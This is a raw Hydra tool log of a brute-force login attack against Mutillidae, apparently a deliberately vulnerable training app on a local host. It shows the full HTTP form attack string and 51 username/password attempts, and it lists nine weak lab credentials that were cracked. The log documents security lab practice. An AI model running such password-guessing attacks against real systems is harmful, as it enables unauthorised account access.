Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-18 15:31:42
[DATA] max 5 tasks per 1 server, overall 5 tasks, 51 login tries (l:17/p:3), ~11 tries per task
[DATA] attacking http-post-form://mutillidae.local:80/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:S=302 Found
[ATTEMPT] target mutillidae.local - login "admin" - pass "password" - 1 of 51 [child 0] (0/0)
[ATTEMPT] target mutillidae.local - login "admin" - pass "password1" - 2 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "admin" - pass "Password1" - 3 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "adrian" - pass "password" - 4 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "adrian" - pass "password1" - 5 of 51 [child 4] (0/0)
[ATTEMPT] target mutillidae.local - login "adrian" - pass "Password1" - 6 of 51 [child 0] (0/0)
[ATTEMPT] target mutillidae.local - login "bobby" - pass "password" - 7 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "bobby" - pass "password1" - 8 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "bobby" - pass "Password1" - 9 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "bryce" - pass "password" - 10 of 51 [child 4] (0/0)
[80][http-post-form] host: mutillidae.local   login: bobby   password: password
[ATTEMPT] target mutillidae.local - login "bryce" - pass "password1" - 11 of 51 [child 1] (0/0)
[80][http-post-form] host: mutillidae.local   login: bryce   password: password
[ATTEMPT] target mutillidae.local - login "cal" - pass "password" - 13 of 51 [child 4] (0/0)
[ATTEMPT] target mutillidae.local - login "cal" - pass "password1" - 14 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "cal" - pass "Password1" - 15 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "dave" - pass "password" - 16 of 51 [child 0] (0/0)
[80][http-post-form] host: mutillidae.local   login: cal   password: password
[ATTEMPT] target mutillidae.local - login "dave" - pass "password1" - 17 of 51 [child 4] (0/0)
[ATTEMPT] target mutillidae.local - login "dave" - pass "Password1" - 18 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "dreveil" - pass "password" - 19 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "dreveil" - pass "password1" - 20 of 51 [child 0] (0/0)
[ATTEMPT] target mutillidae.local - login "dreveil" - pass "Password1" - 21 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "ed" - pass "password" - 22 of 51 [child 4] (0/0)
[ATTEMPT] target mutillidae.local - login "ed" - pass "password1" - 23 of 51 [child 1] (0/0)
[80][http-post-form] host: mutillidae.local   login: dreveil   password: password
[ATTEMPT] target mutillidae.local - login "ed" - pass "Password1" - 24 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "jeremy" - pass "password" - 25 of 51 [child 0] (0/0)
[ATTEMPT] target mutillidae.local - login "jeremy" - pass "password1" - 26 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "jeremy" - pass "Password1" - 27 of 51 [child 4] (0/0)
[80][http-post-form] host: mutillidae.local   login: jeremy   password: password
[ATTEMPT] target mutillidae.local - login "jim" - pass "password" - 28 of 51 [child 0] (0/0)
[ATTEMPT] target mutillidae.local - login "jim" - pass "password1" - 29 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "jim" - pass "Password1" - 30 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "john" - pass "password" - 31 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "john" - pass "password1" - 32 of 51 [child 4] (0/0)
[80][http-post-form] host: mutillidae.local   login: jim   password: password
[ATTEMPT] target mutillidae.local - login "john" - pass "Password1" - 33 of 51 [child 0] (0/0)
[80][http-post-form] host: mutillidae.local   login: john   password: password
[ATTEMPT] target mutillidae.local - login "kevin" - pass "password" - 34 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "kevin" - pass "password1" - 35 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "kevin" - pass "Password1" - 36 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "patches" - pass "password" - 37 of 51 [child 4] (0/0)
[ATTEMPT] target mutillidae.local - login "patches" - pass "password1" - 38 of 51 [child 0] (0/0)
[ATTEMPT] target mutillidae.local - login "patches" - pass "Password1" - 39 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "rocky" - pass "password" - 40 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "rocky" - pass "password1" - 41 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "rocky" - pass "Password1" - 42 of 51 [child 4] (0/0)
[ATTEMPT] target mutillidae.local - login "samurai" - pass "password" - 43 of 51 [child 0] (0/0)
[ATTEMPT] target mutillidae.local - login "samurai" - pass "password1" - 44 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "samurai" - pass "Password1" - 45 of 51 [child 2] (0/0)
[ATTEMPT] target mutillidae.local - login "scotty" - pass "password" - 46 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "scotty" - pass "password1" - 47 of 51 [child 4] (0/0)
[ATTEMPT] target mutillidae.local - login "scotty" - pass "Password1" - 48 of 51 [child 0] (0/0)
[80][http-post-form] host: mutillidae.local   login: scotty   password: password
[ATTEMPT] target mutillidae.local - login "simba" - pass "password" - 49 of 51 [child 3] (0/0)
[ATTEMPT] target mutillidae.local - login "simba" - pass "password1" - 50 of 51 [child 1] (0/0)
[ATTEMPT] target mutillidae.local - login "simba" - pass "Password1" - 51 of 51 [child 2] (0/0)
[80][http-post-form] host: mutillidae.local   login: simba   password: password
1 of 1 target successfully completed, 9 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-18 15:31:47
